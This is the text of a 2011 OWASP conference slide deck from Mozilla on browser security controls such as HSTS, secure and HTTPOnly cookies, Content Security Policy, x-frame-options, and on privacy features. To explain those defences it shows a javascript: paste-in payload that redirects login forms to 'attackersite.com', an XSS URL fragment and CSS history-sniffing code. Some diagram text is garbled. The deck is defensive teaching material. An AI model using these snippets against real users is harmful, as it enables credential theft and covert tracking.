Date post: | 29-Jan-2018 |
Category: |
Technology |
Upload: | michael-coates |
View: | 12,546 times |
Download: | 1 times |
Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Enabling Browser Security in Web Applications
August 25, 2011Michael Coates - Mozilla
OWASP
About
• Michael Coates• Senior Manager, Mozilla• Lead of Infrastructure Security Team
• [email protected]• http://blog.mozilla.com/webappsec/• http://michael-coates.blogspot.com• @_mwc
2
OWASP
Agenda
Locking Down SSL/TLSStamping Out Cross Site ScriptingSocio-Technical Attacks Privacy
3
OWASP
Fake certificate attack targets Facebook users in SyriaMay, 2011- theregister.co.uk
How to Hijack Facebook Using FiresheepOctober, 2010 - pcworld.com
Internet traffic was routed via Chinese serversU.S. military sites includedNovember, 2010 - washingtontimes.com
Leaked Report: ISP Secretly Added Spy Code To Web Sessions, Crashing BrowsersJune, 2008 - wired.com
Locking Down SSL/TLS
4
OWASP
Risks of Insecure Communication
High likelihood of attack Open wifi, municipal wifi, malicious ISPEasy to exploit
High impact to user Clandestine monitoring of populationInjection of incorrect/malicious contentNo protection from any defensive systems Design flaw in application
5
OWASP
Insecure Session Management
Secure login over HTTPSPassword submitted encrypted
Immediate redirect to HTTPSession ID sent cleartext <-- vulnerability point
!"#$"%&'("%%)*+,-.'//012'
!"%3*+%"'
!!"#!"#$"%&'
!"%3*+%"'("&'("%%)*+,-.'//012'
https://site.com/login
http://site.com/profile
Firesheep Attack
6
OWASP
Insecure Redirects
User requests HTTP page, response redirects HTTPS302 Response is HTTP <-- Vulnerability Point
!!"#
!"#$$%%&%&&'()*+,-./'$
012$3"456".#$7/.*#5/+%$$%%&'%&&'()*+,-./'$
!"#$8##9:%&&'()*+,-./'$
211$;/<+4$
mybank.com
7
OWASP
Secure Design for Communication
HTTP Strict Transport Security (HSTS)Opt-in security controlWebsite instructs compatible browser to enable STS for
siteHSTS Forces (for enabled site):
All communication over HTTPSNo insecure HTTP requests sent from browserNo option for user to override untrusted certificates
8
OWASP
Strict Transport Security
Browser prevents HTTP requests to HSTS siteAny request to site is “upgraded” to HTTPSNo clear text HTTP traffic ever sent to HSTS siteBrowser assumes HTTPS for HSTS sites
!!"#
!"#$$$%%&%&&'()*+,-./'$ !"#$0##12%&&'()*+,-./'$
344$5/6+7$
'!(
!#
9
OWASP
Cookie Forcing
HSTS also protects against Cookie Forcing
10
OWASP
HSTS FAQ
Is HSTS Cert Pinning?No
Chicken and the EggTechnically, but drastically less chance of attack
Certificate Rotation Problem?No - HSTS forces valid certificate, doesn’t specify which
Browser SupportCurrent: Firefox & Chromehttps://www.owasp.org/index.php/
HTTP_Strict_Transport_Security#Browser_Support
11
OWASP
Protecting Outdated Users
HSTS supported in current browsers (Firefox, Chrome)
Older browsers all support SECURE Cookie FlagSECURE cookie flag
Instructs browser to only send cookie over HTTPSMuch less (and different) protection than HSTS, but
good defense in depth control
12
OWASP
Secure Flag
SECURE Flag doesn’t prevent HTTP requests like HSTS
Just removes SECURE Cookies from HTTP request
!!"#!"#$"%&'
!"%()*%"'+"&'+"%%,)*-./'00123'
+"4$5"'
!!"#!"#$"%&'
+"%%,)*-./'00123'
!"#$"%&'666'
13
OWASP
Defensive Design
HTTP Strict Transport Securityhttp://tools.ietf.org/html/draft-hodges-strict-transport-sec
Set SECURE flag for cookiesSecure application design for TLS
https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
14
OWASP 15
Cross Site Scripting
OWASP
Risks of XSS
Top Web Security Issue on OWASP Top 10 (2011, 2007, 2004)
Impact: Vulnerability allows attacker to change any aspect of a vulnerable web page
Business Impact: Compromise of user accountsFalse data displayed on websiteRemote monitoring of user actions with websiteFull attacker control of content displayed and served
from website
16
OWASP
<div class="featured"><form action="/en-US/firefox/users/login" method="post" id="login" class="featured-inner object-lead">
<div> <input type="hidden" name="data[Login][referer]"
XSS Example
Name:_____
submit
Login: ___Pass: ____
submit to evil site
javascript
javascript<install malware>
(1) Attacker submits malicious code
(2) Code is now part of webpage
(3) Malicious site steals passwords & installs malware
(4) Attacker spreads malicious URLhttp://site.com/?a=%3cscript%3edocument%2e 17
OWASP
Frustrating Problem
XSS issues can occur anywhere user data is used in a webpage
Difficult to identify all output locationsMany frameworks allow design patterns that lead
to XSS issues
18
OWASP
Content Security Policy (CSP)
CSP - New defensive control to eliminate XSS
Allows web site to specify where JavaScript can be loaded from
Injected JavaScript via XSS is rendered inert
Violations & potential XSS attacks are reported to web site for investigation
Name:_____
submit
CSP PolicyX-Content-Security-Policy: allow 'self'; img-src 'self' data:
19
OWASP
<div class="featured"><form action="/en-US/firefox/users/login" method="post" id="login" class="featured-inner object-lead">
<div> <input type="hidden" name="data[Login][referer]" value="/en-US/developers/addons" id="LoginReferer" /><input
XSS Example with CSP
Name:_____
submit
javascript
javascript
(1) Attacker submits malicious code
Name:_____
submit
Violation report sent to site.com/CSPalert
(2) CSP prevents script execution (3) Site safe to use
20
OWASP
Implementing CSP
Some code changes needed to externalize JavaScript
Run CSP in report only mode to testEnable CSP and protect users with browsers
supporting CSPReceive alerts on potential vulnerabilities in app
and quickly address to protect remaining users
21
OWASP
CSP Violation Reporting
Violations of CSP policy reported to specified URL
Acts as XSS intrusion detection system
CSP supported in portion of site users, XSS IDS benefits all
Reported data is from client, trust accordingly
X-Content-Security-Policy: allow self; report-uri http://reportcollector.example.com/collector.cgi
22
OWASP
CSP Violation Reporting
javascript
Violation report sent to site.com/CSPalert
CSP Violation
Report Includes:HTTP Requestrequest-headersblocked-uriviolation-directiveoriginal-policy 23
OWASP
CSP Violation Report
24
OWASP
Other CSP Benefits
Prevent ClickJacking via frame-ancestorsControl embeded frames via frame-srcControl domains for images via img-srcControl target domains via xhr-srcEnforce specific protocols (https://*.foo.com)Future enhancement to control actions & malicious
forms
25
OWASP
Protecting Outdated Users
HTTPOnly mitigates one of XSS impacts - session hijacking
Supported in all recent browsersEasy, opt-in security control to protect users
javascript
Cookie: SessionID
Attacker’s Site
26
OWASP
Defensive Design
CSP gaining traction, potential to solve pressing web security risk
HTTPOnly flag - easy setting to add additional layer of defense
OWASP XSS Prevention Cheat Sheethttps://www.owasp.org/index.php/XSS_
%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
27
OWASP 28
Socio-Technical Attacks “Visual Fraud”
OWASP
ClickJacking
Attacker includes victim page in iframe & overlays opaque layer
Attacker’s image image entices click and text interaction
Clicks are registered on victim site underneath
User inadvertently performs action at victim site
Attacker’s Overlay
Victim Site
29
OWASP
ClickJacking Example
[ ] Grant Joe full profile access
Click to follow Joe
Confirm
Click the Bouncing Ball
30
OWASP
ClickJacking Defenses
x-frame-options headerFull solutionCompatible with new versions of browsers
Frame Busting ScriptsPartial solutionCompatible with older browsers
31
OWASP
x-frame-options
Additional header for HTTP Response
Instructs browser to disallow framing
Two options - DENY, SAMEORGIN
Text
HTTP/1.1 200 OKServer: Apache-Coyote/1.1Content-Type: text/html;Vary: Accept-EncodingContent-Length: 35236x-frame-options: DENY
HTTP/1.1 200 OKServer: Apache-Coyote/1.1Content-Type: text/html;Vary: Accept-EncodingContent-Length: 35236x-frame-options: SAMEORIGIN
32
OWASP
x-frame-options
Targeted site not display if framed
Error page displayedPrevents ClickJacking
attackAttacker’s Overlay
Victim SiteAttempted ClickJack
x-f-o Result
33
OWASP
Frame Busting Scripts
JavaScript within page to detect framing
Will either “bust” the frame or not display content
Not optimal solution - techniques available to bypass defense
<script> if (document.top!= document.location){document.top= document.location} </script>
34
OWASP
URL Social Engineering
“Cool new hidden feature”
“Get 10 free gems for your game”
Click the square and type the secret combination
ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter
35
OWASP
click square - selected text element
ctrl a - select all textctrl c - copy textctrl l - select location barctrl v - paste textenter - execute JavaScript
Danger of those keystrokes...
javascript:var xmlHttp;xmlHttp=new XMLHttpRequest();xmlHttp.open("GET", document.location, false);xmlHttp.send();xmlDoc=xmlHttp.responseText;var str=xmlDoc;x.replace(/somesite\.com/, "attackersite.com"); document.writeln(x);
javascript:....
36
OWASP
URL JavaScript
Pasted JavaScript has full control of page
Can rewrite pageExtract and send any
dataNo indication to user
username:_____password:_____submit
Before
After
username:_____password:_____submit
somesite.com
attackersite.com
37
OWASP
Defense
Code Change to BrowserRemove association between javascript: & loaded
documentRenders attack inert
38
OWASP
Privacy
Your Android Phone is Tracking YouApril, 2011 - pcworld.com
Nissan car secretly shares driver data with websitesJune, 2011 - theregister.co.uk/
Your iPhone Is Tracking Your Every MoveApril, 2011 - readwriteweb.com
Mobile-App Makers Face U.S. Privacy InvestigationApril, 2011 - online.wsj.com
39
OWASP
Privacy
Business gains from gathering user dataPrivacy infringement based on lawsPrivacy concerns based on user expectationsNeed better options for user to understand
collected data, control flow and accessibility of user data
40
OWASP
Browser Profiling
PanopticlickFingerprints browser based
on provided informationPlugins installedFont SupportScreen ResolutionTime Zone
Your browser fingerprint appears to be unique among the 1,636,839 tested so far.Currently, we estimate that your browser has a fingerprint that conveys at least 20.64 bits of identifying information.
41
OWASP
CSS History Sniffing
Determine user’s browsing habits with CSS
Visited link different than non-visited link
CSS and element inspection determines visited pages
Issued fixed March 2010
Visited Link
Unvisited Link
if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") { // link.href has not been visited} else { // link.href has been visited }}
http://dbaron.org/mozilla/visited-privacy
42
OWASP
Evercookie
“Its [evercookie] goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others.”
Multiple methods of storing & data on client
Could be abused for unauthorized tracking
Goal to keep user in control of data storage / tracking mechanisms
• Standard HTTP Cookies
• Local Shared Objects (Flash Cookies)
• Silverlight Isolated Storage
• Storing cookies in RGB values of auto-generated, force-cached
• PNGs using HTML5 Canvas tag to read pixels (cookies) back out
• Storing cookies in Web History
• Storing cookies in HTTP ETags
• Storing cookies in Web cache
• window.name caching
• Internet Explorer userData storage
• HTML5 Session Storage
• HTML5 Local Storage
• HTML5 Global Storage
• HTML5 Database Storage via SQLite
http://samy.pl/evercookie/
43
OWASP
Do Not Track
Adds header DNT: 1 to all web requests
Tells websites user does not want browsing activity to be tracked
http://dnt.mozilla.org/
44
OWASP
Permission Manager
Granular management options for user interaction with sites
ControlLocation SettingsCookie SettingsPopup WindowsOffline Storage
about:permissions
45
OWASP
Privacy Design
Privacy controls distinguish applicationsDesign with privacy in mindGrowing support for DNT
46
OWASP
Closing
Defense In DepthMany new security controls to enhance security Strict Transport SecurityContent Security Policyx-frame-optionsDo Not Track
47